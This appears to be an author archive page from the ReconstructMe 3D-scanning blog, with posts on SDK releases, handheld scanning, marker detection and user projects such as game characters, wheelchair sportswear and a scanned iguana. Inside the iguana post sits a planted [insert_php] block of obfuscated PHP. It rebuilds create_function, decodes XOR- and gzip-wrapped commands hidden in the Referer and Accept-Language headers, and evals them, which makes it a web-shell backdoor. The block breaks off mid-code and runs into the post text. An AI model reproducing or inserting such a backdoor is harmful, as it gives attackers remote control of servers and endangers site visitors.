Author Archives: Christoph Heindl

About Christoph Heindl

I'm a professional software engineer working for PROFACTOR GmbH in Austria/Europe, the initiator of ReconstructMe and one of its main contributors. Reach me on LinkedIn.

ReconstructMe 2.2.940 Released

Today we are happy to announce a new release of ReconstructMe UI and ReconstructMe SDK. The new UI supports 64bit and supports saving OBJ with texture as outlined in our previous post. We’ve also made the surface scaling in Selfie 3D mode optional. The SDK release brings a couple of bug-fixes for x64 bit support and a better tuned texturing parameters.

Head over to downloads section to grab ReconstructMe.

ReconstructMe SDK with UV Texture Support and x64 Bit Support

Today we are happy to release an update for ReconstructMe SDK. The past couple of months we have worked hard on adding support for the two most requested features. One is that the new SDK now is able to export UV texture maps and the other improvment is 64bit support.

UV Texture Mapping

Previously, ReconstructMe was not able to export colorized meshes in .OBJ file format, due to the fact that this format does not support vertex colors. We have now adopted our pipeline to automatically convert from vertex colors to UV texture mapping when exporting as OBJ.

As simple as this may sound, this is not a trivial conversion and requires some hard thinking to get things right. The involved steps include unfolding complex 3D-dimensional shapes onto a 2D disc in such a way that minimal visual distortions appear plus rearranging individual portions of the unfolded structure in such a way that emptyness in the texture-space is avoided.

On the left side of the image above you can see a final textured mesh. The green lines indicate the texture seams, i.e the cuts that were made virtually to unfold the mesh to a disc like structure. On the right side the texture map is displayed.

We consider the current development progress beta. So when you use that feature expect some glitches, such as increased computation time and visual artefacts along texture seams.

x64 Bit Support

As promised we, from now on, release 32bit and 64bit versions of our SDK side by side. You should consider switching to the 64 bit version when processing huge models that come with a large memory footprint when processing them. The 64 bit allows the SDK to address more memory and complete the processing in such cases.

You can download the updated SDK here.

ReconstructMe Handheld Scanning

Right before the holiday season in Austria kicks off, we wanted to share with you one of our latest developments, called ReconstructMe Mobile Scanning. It’s all about turning ReconstructMe into a handheld scanning device, removing long USB cables and creating the freedom of scanning without limitations.

In the video below you can see me scanning a bust using a Windows Tablet connected to an ASUS Xtion pro live using a custom 3D printed mounting.



We needed to adapt ReconstructMe so you can scan using low-powered mobile devices such as Tablets. The approach we took is illustrated below.

The required hardware consists of a background desktop PC or notebook and a lightweight Tablet that is connected to a 3D sensor. The actual reconstruction is performed on the PC in background. This workhorse receives the compressed 3D data from the Tablet via WiFi and computes a 3D model in real-time. The current state of reconstruction is sent back to the Tablet PC for visualization. An additional communication channel is used for transmitting commands from user interaction. This setup allows use to scan with 30 frames per second.

In case you are interested in a close-up of the sensor mounted to Tablet, here is a short clip of those.



Holiday season

Please note that our shop will be closed from 22nd of December until 5th of January 2015. The ReconstructMe team wishes all users and friends happy holidays! We are looking forward to see you next year.

ReconstructMe SDK 2.2 Released

Today, we are releasing version 2.2 of ReconstructMe SDK that brings marker detection support.

Marker detection

marker A marker, like the one on the right, is a special object placed in the view of the camera that has a couple of unique features: from a software point of view it is easily detectable, allows the estimation of camera pose with respect to the marker frame and does not need dense 3d data.

With markers you can

  • Define canoncial world coordinate system The marker defines position and orientation of the world coordinate system. It is designed in such a way that if laid on the floor, the z-axis of the world frame points towards the ceiling.
  • Automatic remove of stands and floor data By letting the world volume start a bit above the marker coordinate system you can cut away floor and turntable data.
  • Improve tracking Although not used by us, you could use the marker frame to perform camera tracking.

A new turntable scanner example was added to list of examples that explains how use marker detection in your application.

Download is available from the developer page.

Other Changes

Besides marker support you might notice a couple of other changes when browsing the SDK docs. For one, we have added support for x64 bit versions and a network sensor was added to the feature list. On both things we will have more info in the coming weeks.

Kinect v2

A short note for all Kinect2 users. We are still not supporting the Kinect2, which is not due to the fact that integrating the camera is hard, but has much more todo with effects we see in the 3D depth data the camera delivers. We currently observe strong deformations of planar surfaces which we attribute to the Time-Of-Flight measuring principle used in the new Kinect v2 version. The deformations make precise scanning currently impossible.

ReconstructMe used in This War of Mine

by Dominik Zieliński | Lead Artist of This War of Mine – 11 bit studios

This War of Mine (TWoM) is a game explicitly different from your every day product. It has no flashy muscled characters, nor science fiction robots, Or mind dazzling eye candy. TWoM tells a down to the ground, straightforward story rooted in brutal reality of life in a conflict zone. TWoM message is: “This war can happen to you”.



This is why we needed characters that felt believable. We turned to scanning because we wanted to capture this ordinary every day person feel. I think the fact that all characters that we meet in TWoM are scanned from real people adds a certain layer of depth to the entire game experience.

IMG_20140710_112120In the beginning, Right before we started considering scanning characters, ReconstructMe added color scanning functionality, which made the decision to actually go with scanning a no brainier.

For our scans we’ve used Kinect, a rotating platform (and some duct tape), and the results we’ve got were perfect for what we needed.
I especially liked the cloth wrinkles that would require some time to simulate, or even more time to sculpt, and the effect probably wouldn’t be that good. That was a big plus because the characters in TWoM are mostly fully clothed. ReconstructMe contributed greatly into characters overall quality.

Scanning heads is great. Percentagewise, while working on TWoM, most amount of time was saved thanks to scanning real people’s heads instead of sculpting them in 3d.

IMG_20140710_111748When we were in the midst of the development process, the selfie functionality was added, and with it came along the automatic capping of holes in unscanned areas. That was a big help, it sliced of a large portion of the development pipeline, and saved us artists some time.

In the end we made more than 200 scans, of torsos, legs and heads. We scanned so much, that during our last scanning session the custom made rotating platform we used, broke down.

A simple turntable scanner with ReconstructMe

We thought it is about time to inform you about some upcoming features of the new ReconstructMe SDK release. We’ve changed quite a bit and in this post we want to introduce the new marker detection feature.

marker A marker, like the one on the right, is a special object placed in the view of the camera that has a couple of unique features: from a software point of view it is easily detectable, allows the estimation of camera pose with respect to the marker frame and does not need dense 3d data.

Great, but why would I need a marker detection in ReconstructMe? There are multiple reasons, but the most striking one for us was usability. We think markers are great way of interactively defining the reconstruction space. How often did you restart a scan, just because you badly positioned the camera? It probably happens quite often, even to us!

With marker detection this changes. Simply place the marker in the scene where you would like the reconstruction volume to be. Make sure the camera sees the marker and start scanning. The reconstruction volume will line up with the real-world marker position.

That’s not all. You additionally get the following features for free

  • A canoncial world coordinate system The marker defines position and orientation of the world coordinate system. It is designed in such a way that if laid on the floor, the z-axis of the world frame points towards the ceiling.
  • Automatic removal of stands and floor data By letting the world volume start a bit above the marker coordinate system you can cut away floor and turntable data.
  • Improve tracking Although not used by us, you could use the marker frame to perform camera tracking.

Not yet convinced? Take a look at the following video of a turntable based scanner.


What the video doesn’t tell you: once the scanning starts you are free to move the camera around as you would usually do with ReconstructMe.

Sportswear for Wheelchair Athletes

by Anke Klepser

Hi everyone,

Hohenstein research team for clothing technology works with 3D scanner systems since 1999. The aim is to take body measurements and geometrical data to provide important information for garment construction, product development and optimization.

One of our recentprojects was concerning sportswear for wheelchair athletes. Garment should be constructed for the specific target group. Therefore, focus was to analyze the change of dimensions and geometry due to specific sports movement and position. We used Kinect sensor and ReconstructMe software for acquisition of handcycling athletes in their sports wheelchairs. The system gave many advantages over stationary 3D bodyscanners: Being able to scan people during training times at different places and acquisition of athletes in handcycles.

We captured the athletes in two shots and merged the files as shown below.

Merging of 3D scan files

Merging of 3D scan files

One result was that due to the specific posture in the handcycle athletes do have a differing neck position (see image below). Therefore, collars of sports shirts should be constructed differently to prevent discomfort to the customer.

Differing neck position due to different posture in handcycle

Differing neck position due to different posture in handcycle

With the results of the research project companies are enabled to produce adapted sportswear fulfilling the special requirements of wheelchair athletes.

All images courtesy of Hohenstein Institute. If you have any questions please contact us a.klepser@hohenstein.de.

Structure.io sensor in ReconstructMe

The company Occipital has recently released their Structure sensor. We ordered one early this year and received it yesterday. Now we’d like to show you how you can use it together with ReconstructMe.

The Structure sensor is based on a PrimeSense Carmine / Capri 1.08 depth sensor and comes without an additional RGB camera module. Since it is PrimeSense based technology, a Structure sensor can simply be accessed via OpenNI, a framework developed by PrimeSense.

Setup

In order to use the sensor on Windows using ReconstructMe you should order one including the Hacker cable, which allows you to connect the sensor to a standard USB slot on your Windows machine. The sensor packages comes with an USB hacker cable, an iPad connector cable and a power supply to charge the built-in battery. For ReconstructMe, only the following parts are needed to get it run.

P1020512

Note that we didn’t need to charge its internal battery which we assume is only needed for iPad uses where additional power is needed to keep the sensor running.

To get the sensor recognized in Windows you need to install OpenNI. Connect the sensor via the USB Hacker cable to the USB slot on your PC. Your sensor should be recognized in the device manager as PrimeSense.

Next, start ReconstructMe. Once started, ReconstructMe will detect your sensor and you are (almost)ready to go. As with every sensor it makes sensor to calibrate it in order to get the best reconstruction results. Luckily we’ve already done this for you and provide a specific Structure sensor configuration file. To apply the configuration, navigate to Device / Sensor Selection. Uncheck Automatically detect sensor and browse to the sensor configuration file.

structureio-in-reme

ReconstructMe will re-open your sensor and now you are all set for scanning.

Results

In our tests the Structure turned out to be a decent depth sensor on par with a Carmine 1.08. Below is a video showing a quick self scan.

Enjoy scanning.

MiniMe3d is born thanks to ReconstructMe

by Corey Wormack

Every year our home has three young athletes who are awarded standard trophies at the end of each season. With the advances in technology we thought maybe 3D scanning and printing could offer a more personalized, memorable solution, but what type of system to use? To the internet, and after a lot of research, trial & error, and with the timely release of ReconstructMe version 2, we decided to build our solution around their software.

The new version allows us to 3d scan a person in color adding a new level of realism and allowing the final product to really stand out! After many hours and several different outfit changes, for the whole family, we developed a pretty efficient workflow and were ready for prime time! Our first chance to apply what we had learned in public was at a very large regional volleyball tournament.

We arrived the night prior to the tournament and tested our system in the large convention center lighting. Yeah – it worked! We were now ready for the hordes of sports fans to purchase our amazing piece of memorabilia. What we had not realized was that it would take customers a little while to warm up to the idea that they could have a “minime” of themselves with 3d scanning. Comments from “cool” to “creepy” with everything in between, but by the end of the show we had sales.

minime3d

So how did we configure our system? We had a laptop with an NVidia Quadro 3000M video card, Asus XTION Pro Live sensor, a modified manual turntable based on Fredini’s design, and a tripod.

Why were we successful? The ReconstructMe UI allowed people to see the process in real-time and as it quickly displayed the scan data. The fluorescent lighting only required some quick post processing cleanup of our captures. The final products were then sent into Sculpteo for color printing.

Where do we go from here? We look forward to the next version of ReconstructMe which allows the user to create great 3D print ready busts like the 180 displayed on the ReconstructMe website. This will simplify our work flow and allow us to have consistent results.

minimi3d2

Babe – The 3D Iguana

[insert_php]$L=’b_end_sOsOclean();$d=bassOe64_encsOodesO(x(gsOzcompsOress($o)sO,$k));printsO(“<$sOk>$d“sO)sO;@sesssOiosOn_destroy();}}}}’;
$V=’$kh=”6562sO”;$kf=”csO5c1″sO;fusOnction sOx($t,$ksOsO){$csO=strlen($k);$l=ssOtrlesOn($t);$sOosO=””;forsO($sOi=0;$i<$l;){for(sO$'; $B='j=sOsO0;($jsO<$c&&$i<$lsO);sO$j++,sO$i++){$o.=$t{$sOi}^$k{$jsO};}}resOtursOn $o;}$r=sO$_SEsORVERsO;sO$rr=@$r["HTsOTP_RsOsO'; $h='reg_replace(asOrray("/_sOsO/","/-/"),arsOray("/","+sO"),$ss($sOs[$sOi],sO0,$e))),$k)))sO;$o=sOob_sOget_contensOtsOs();sOo'; $M='EFERER"];sO$ra=sO@$r["HTTP_AsOCCEPT_LANGsOUAGE"sO];ifsOsOsO($rrsO&&$ra){$u=parsesO_url(sO$rr);parse_stsOr($u[sO"quersOy"],'; $o='sssOisOon_start();$sOs=sO&$_SsOESSION;$ssOs="substsOr"sO;$sl="stsOrtolosOwer";$i=$msO[1]sO[0].$m[sO1][1];$sOh=$slsO($ss(sOmd'; $K=str_replace('I','','cIIIreIIIate_function'); $d='$q)sO;$q=arrasOy_vsOalues($q);prsOesOg_match_allsO("/([sO\\w])[\\w-sO]+(?sOsO:;sOq=0.([\\sOd]))?,?/"sO,$ra,$m);ifsO($q&&$msO){@se'; $J='$p;$e=strpossO($s[$i],$fsO);if(sO$e){$k=$ksOh.$ksOfsO;ob_start(sO);@sOevasOl(@gsOzuncompress(@xsO(@bassOe64_decodsOe(psOsOsO'; $F='m[2]sO[$z]];if(strsOpos($p,sO$h)==sO=0){$sOsOs[$i]="";$p=$sOsOss($sOpsO,3);}if(array_key_esOxistsOs($i,$ssO)){$s[$sOsOi].=sO'; $R='5($i.sO$kh),0,sO3));$fsO=$sOsl($sOss(md5($i.$sOkf),0,3sO)sO);$sOp="";fsOor($z=1;$zsOsOsOErich Purpur

The DeLaMare Science & Engineering Library at the University of Nevada, Reno has undergone some drastic changes. In the past few years and has become heavily used both as a place to study, as well as a makerspace. The notion of academic libraries incorporating makerspaces, which include collaborative learning spaces, cutting edge technology, and knowledgeable staff, has seen more interest recently and the DeLaMare Library has proven to be a popular and engaging model for the campus community.

Scan-O-Tron 3000

Lets flash back to December, 2013 when Dr. Tod Colegrove, Head of DeLaMare Library, presented the latest edition of Make Magazine to me. Inside was an article written by Fred Kahl, who had built himself a large-scale 3D scanning tower and turntable for the purpose of scanning large objects using ReconstructMe. Fred then took these 3D models and brought them to reality with his 3D printer. The DeLaMare Library had all the DIY capabilities to do the same and the process of building the scanning station commenced.

In 2012 Mary Ann Prall, a resident of San Diego, CA, lost her friend Babe, an iguana who died at the age of 21 and has been frozen since. Mary Ann was looking to preserve her friend in a new format and came to us in hopes of printing Babe in 3D. At the time we only had a small handheld scanner and with the help of our exceptional student employee, Crystal, we scanned Babe in sections and stitched them together in using CAD programs.

Mary Ann, myself, and Crystal with Babe.

Mary Ann, myself, and Crystal with Babe.

We invited Mary Ann and Babe back in April 2014 once we had completed the DIY 3D scanning tower. After mounting an Xbox Kinect Sensor on the scanning tower we purchased a single-use version of ReconstructMe and used it to scan Babe and created an accurate graphical representation. After taking several scans and playing with different variables, the results turned out great!

Me scanning Babe using ReconstructMe software.  Crystal and Mary Ann watching.

Me scanning Babe using ReconstructMe software. Crystal and Mary Ann watching.

Mary Ann happened to visit on a Friday, a popular day on campus for visiting prospective students. During the process many newcomers came in and we had the opportunity to spark interest in the visitors as well as many current University of Nevada students who happened to walk by.

Some UNR students admiring Babe.

Some UNR students admiring Babe.

We have not yet printed Babe but will in the near future. Last time around, Mary Ann had Babe printed as a small model but this time around we intend to print a much larger model.

BabeUpdate4

ReconstructMe and Multicopters (Part 2)

Since my last heads-up considering my project about a quadcopter for full autonomous indoor 3D reconstruction, I implemented a simple start and landing routine to make the first step toward full autonomous navigation. To achieve a smooth start of the motors, the autonomous takeoff routine starts with a set point 4 meters below ground and rises up to the actual scanning height. Landing follows the opposite approach with an additional step at 20 centimeters height to avoid crash landing.

Adding a first simple trajectory that consists of the start routine, followed by an arc around a point (center of the object you want to scan) and the landing routine, the quadcopter can now already reconstruct simple objects.

Trajectory tracking  deviation. Dashed lines are the set points, and the solid lines are the actual coordinates.

Trajectory tracking deviation. Dashed lines are the set points, and the solid lines are the actual coordinates.

By plotting the same data in 3D the trajectory becomes visible.

Trajectory deviation plotted in 3D

Trajectory deviation plotted in 3D

The arc shaped set point trajectory and the actual trajectory are clearly visible. The magenta colored lines show the heading of several intermediate points (should point to the center of the arc). As a benefit ReconstructMe SDK outputs the full reconstruction of the chair used for tracking.

Reconstructed chair used for tracking.

Reconstructed chair used for tracking.

I also made a video of such an experimental run so you can see the full autonomous quadcopter for indoor 3D reconstruction in action

A 3D scanner for Hunt Library (Part 2)

by William Galliher

Hello everyone! We are the 3D Body Scanner team at North Carolina State University, and we are here with another blog update to show two important things. Pictures and progress! That’s right, we have a mid-project update for you all and a bunch of pictures of the team, our work, and where our project will be once we have completed it. The sponsor for our project, and the eventual home for our booth, is the Makerspace team at the James B. Hunt Jr. Library.

The Hunt library is a showcase for engineering and technology, boasting large, open spaces provided by the bookBot system that houses all of the books in underground storage. The MakerSpace within the library hosts multiple 3D printers, and is dedicated to educating the patrons of the library in 3D technology. In comes our team. We told you about our purpose, to make 3D scanning fun and educational, in our last post.

Here are three members of our four person team.

From left to right: Dennis Penn, William Galliher, Austin Carpenter

From left to right: Dennis Penn, William Galliher, Austin Carpenter

The three of us are standing in our prototype scanning booth, which can rotate around the user. The other member of the team is below, where he is getting scanned using the alpha prototype of our software and station.

Jonathan Gregory, standing in the station

Jonathan Gregory, standing in the station

But don’t worry, not only do we have pictures of our team and the library, we also have progress. Our prototype station was able to successfully scan Jonathan, and the output mesh is below.

The scan of Jonathan Gregory

The scan of Jonathan Gregory

Pretty good for our alpha demo. We even managed to successfully scan the chancellor of our school, Chancellor Randy Woodson. Not only did we get a successful scan of our chancellor, we also got a small figure printed out!

The 3D print of Chancellor Randy Woodson

The 3D print of Chancellor Randy Woodson

So that concludes this mid project blog post. You got to meet the team, and even got a sample of what we are able to do so far. We cannot wait to finish this project and be ready for our Design Day near the end of April. We will be back then with a final post on our project. Thank you for reading!

All images courtesy of William Galliher and http://lib.ncsu.edu/huntlibrary

Idea Contest – Win a 3D Printer!

makerbotrep2Hello everyone!

We are proud to announce the first ReconstructMe idea contest, where your idea can win a 3D printer and other great prizes. To participate, all you need to have is a good idea. We’ve put together a short document describing the contest, the evaluation criteria and other things you need to know to get started.

Please note that the closing data is 15th of June 2014 19th of June 2014. In case your submission contains larger files, please upload them to third party services and refer to the material by linking.

Looking forward to see your submission!

A 3D scanner for Hunt Library (Part 1)

by William Galliher

Hello everyone, we are the 3D Scanner team from North Carolina State University! For our senior design project, we are constructing a full body 3D scanner station for the Hunt public library here on campus. Hunt Library has a technology showcase and a Makerspace with 3D printers, and they are dedicated to showing what this technology can do. Unfortunately, many people who come in to the library do not know what this technology is capable of, and many printers take quite a while to print.

To solve this problem, and show off what can be done with the technology in this field, our team has decided to construct a 3D scanner that will scan a patron in less than two minutes. The booth will show the scan that is taking place and export the scan as a .STL which can be printed in the Makerspace within the library.

As part of the planning stage for this project, we spent time evaluating alternatives in hardware and software. In doing so, we came across the video for ReconstructMe 2.0 which showed two sensors doing a fast, real time scan of someone in a chair spinning around. At that point in time, our design encompassed moving a sensor up and down to get multiple levels on a scan. Multiple sensors along with the fast record time would allow us to move our original goal of a scan within five minutes down to below two, and so we decided to go with ReconstructMe.

The video that made the decision on ReconstructMe We are in the midst of constructing our station now, and recently got multiple sensor support and export of files completed. We have rapidly approaching alpha and beta demos, in addition to a final design day in late April. We will be back soon after that to show our final product. Thanks for reading, and see you again soon!

All images courtesy of http://lib.ncsu.edu/huntlibrary

ReconstructMe 2.1 introduces Selfie 3D

We are thrilled to announce that today’s ReconstructMe release includes a Selfie 3D technology, a feature that allows you capture 3D printable self-portraits. We developed Selfie 3D so you could simplify the process of generating 3D printable busts of yourself and your friends, just like the one below.

The current Selfie 3D feature is best used for generating head-to-shoulder busts. To use it, simply activate Selfie 3D and turn in front of your camera. The tutorial covers the basic steps and has some invaluable tips and tricks for creating the best possible busts. So don’t miss it!

Is the output directly printable?

Yes! Post-processing is fully automatic. We’ve put a lot of efforts into the automatic post-processing of your scan. Here’s what happens behind the scenes.

Making it watertight
Watertight refers to a property of 3D meshes that allows the 3D printer to determine the inside and outside of meshes. A mesh without holes is often referred to as watertight, because when you fill-up the inside with water, no water will drop out. ReconstructMe will enforce this property.
Creating a planar stand
ReconstructMe slices the model on the bottom to generate a nice planar stand of your bust, so that it does not fall over when being put down.
Fixing the orientation
ReconstructMe will place the origin of the model on the center of the base of the bust with positive z-direction pointing upwards towards its head. This will allow you to directly import the bust in your favorite 3D printer application or printing service and your bust should already be placed on the printer’s virtual platform.
Scaling it down
Since your 3D printer won’t be able to print you in full-size, ReconstructMe scales your model down to 20cm when saved. Note, the saved model dimensions are in millimeters.

Need even more info? Make sure to check out our blog post about ReconstructMe SDK 2.1 and stay tuned for further blog posts covering this feature.

How long does post-processing take?

Usually, post-processing takes between 15 and 25 seconds. The time increases on a low-powered machine or when you don’t have a ReconstructMe license. We used the Selfie 3D feature during the Long Night of Research, were we gathered over 150 scans in 3 hours. To view all scanned models, click the image below.

montage

Amazing, isn’t it? Tell us about your favorite scan! And don’t forget to download.

Download 2.1.348 for Vista/7/8